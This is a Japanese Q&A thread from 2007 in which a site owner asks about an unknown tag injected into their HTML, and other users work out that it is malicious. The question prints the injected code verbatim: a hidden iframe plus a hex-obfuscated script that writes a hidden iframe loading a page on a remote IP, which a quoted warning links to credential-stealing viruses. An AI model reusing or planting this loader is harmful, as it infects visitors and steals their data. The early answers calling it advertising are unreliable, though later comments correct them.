HTML上にいれた覚えのないタグが入っていました。<body>の後にです。


<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4765ee14a9c7c(v4765ee14aa163){ var v4765ee14aa47a=16; return(parseInt(v4765ee14aa163,v4765ee14aa47a));}function v4765ee14aac6f(v4765ee14ab068){ var v4765ee14abc60=2; var v4765ee14ab464='';for(v4765ee14ab861=0; v4765ee14ab861<v4765ee14ab068.length; v4765ee14ab861+=v4765ee14abc60){ v4765ee14ab464+=(String.fromCharCode(v4765ee14a9c7c(v4765ee14ab068.substr(v4765ee14ab861, v4765ee14abc60))));}return v4765ee14ab464;} document.write(v4765ee14aac6f('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D66303039376236207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313634333736292B2737366433325C272077696474683D373631206865696768743D323136207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

これはなんでしょうか?どなたか解る方はいますか?

つかっているサーバー会社はXREAです。

回答の条件
  • URL必須
  • 1人20回まで
  • 登録:2007/12/24 17:35:17
  • 終了:2007/12/31 17:40:02

回答(2件)

id:nandedarou No.1

nandedarou回答回数230ベストアンサー獲得回数342007/12/24 18:19:54

ポイント35pt

自動挿入される広告を表示するためのタグだと思います。

XREAは、無料の場合、広告が挿入される仕様です。

有料だと広告の挿入はありませんが、自動的に挿入されるタグの残骸が残っている場合があります。

http://www.xrea.com/?action=ad

id:zachouR

なるほど!

自作のCGIにセキュリティホールがあるのかとおもい、焦ってしまいました。

XREAに確認してみます。

2007/12/24 19:15:35
id:kent0608 No.2

kent0608回答回数220ベストアンサー獲得回数232007/12/24 18:30:26

ポイント35pt

http://troubleshooter.xrea.org/ad.html

XREAの自動広告挿入ではないでしょうか?

id:zachouR

ありがとうございます。

自作のセキュリティホールではないかとおもい、焦りました。

念のため、CGI上も調べてみます。

2007/12/24 19:16:25
  • id:nandedarou
    回答への補足
    よく見たら、私のとコード違いましたが、回答に書いたことと関係しているような気がします。
    回答に書いたこととセキュリティーソフトとの絡みかも知れません。
    セキュリティーソフトがタグを挿入することがあります。
  • id:nandedarou
    只今、ご質問のコードを解析してみました。
    次のURLへアクセスし、表示するようになっています。
    http://77.221.133.188/.if/go.html?ランダムな数値
    たぶんランダムに広告を出すコードなのでしょう。
    (ただ、ちょっと怖いので、実行したら、どうなるか試していません。)
    セキュリティーソフトの影響ではないようです。


  • id:yoshifumi1975
    http://www.justsupportuk.co.uk/77-221-133-188.htm を見ると、やばいことが書いてありますね。
    以下、引用
    ------
    Damage:
    This code will download 2 viruses to any machine view any of the infected pages, these virus then pass key information from your machine, including bank, ftp and password details,

    If you have view a site that tries to take you to http://url' then you should get the latest anti-virus and run it a few times over 4 to 5 days, you should stop typing any details you want to keep, use cut and paste,

    Files to look for are:
    info.exe
    ntos.exe

    Banker.virus

    Banker.info
    ------
  • id:zachouR
    これは、やばいですね、、、。ようするにウイルスなんでしょうか?

    見た人が感染する?

    しかし、なんでまたこれが、、、。
  • id:nandedarou
    広告ではなかったようですね。申し訳ありませんでした。ウイルスを送り込むページにアクセスするようですね。

    >しかし、なんでまたこれが、、、。

    もう一度、正常なHTMLファイルをXREAに転送して、同じことが起こるか確かめてみましたか?
    もし、何度でも同じことが起こるなら、XREAのサーバに感染している可能性があるように思います。
    同じことが起こらないなら、XREAのサーバのご自分のアカウントが誰かにハッキングされHTMLを書き換えられた可能性、HTMLファイルを作ったPCがハッキングされた可能性、HTMLファイルを作ったPCにウイルスが感染している可能性などが考えられそうですね…。
  • id:dwing
    私も4月15日に全く同じタグが勝手に記述されていました。

    会社でメディア媒体用で使用している
    各ファイルの

    index.html
    index.php
    index.cgi
    index.shtml
    の200ファイルくらいが
    が対象です。
    サーバーは各種、5社くらいのサーバーを使用しているので、特にXREAだけではないようです。

    只今調査中ですので何かわかりましたら情報を提供いたします。
  • id:zachouR
    これは、なんらかのアタックだと思っています。現在は削除していますが。

    時間系列までははっきりとはわかりませんが、海外からのアクセスがあったようです。そこまではわかりました。

    なにかの情報がありましたら、教えて下さい。
  • id:chirubo
    こちらにも書きました。

    http://q.hatena.ne.jp/1209356125
  • id:zachouR
    継続情報、ありがとうございます。

    よろしくお願いいたします。

この質問への反応(ブックマークコメント)

「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

絞り込み :
はてなココの「ともだち」を表示します。
回答リクエストを送信したユーザーはいません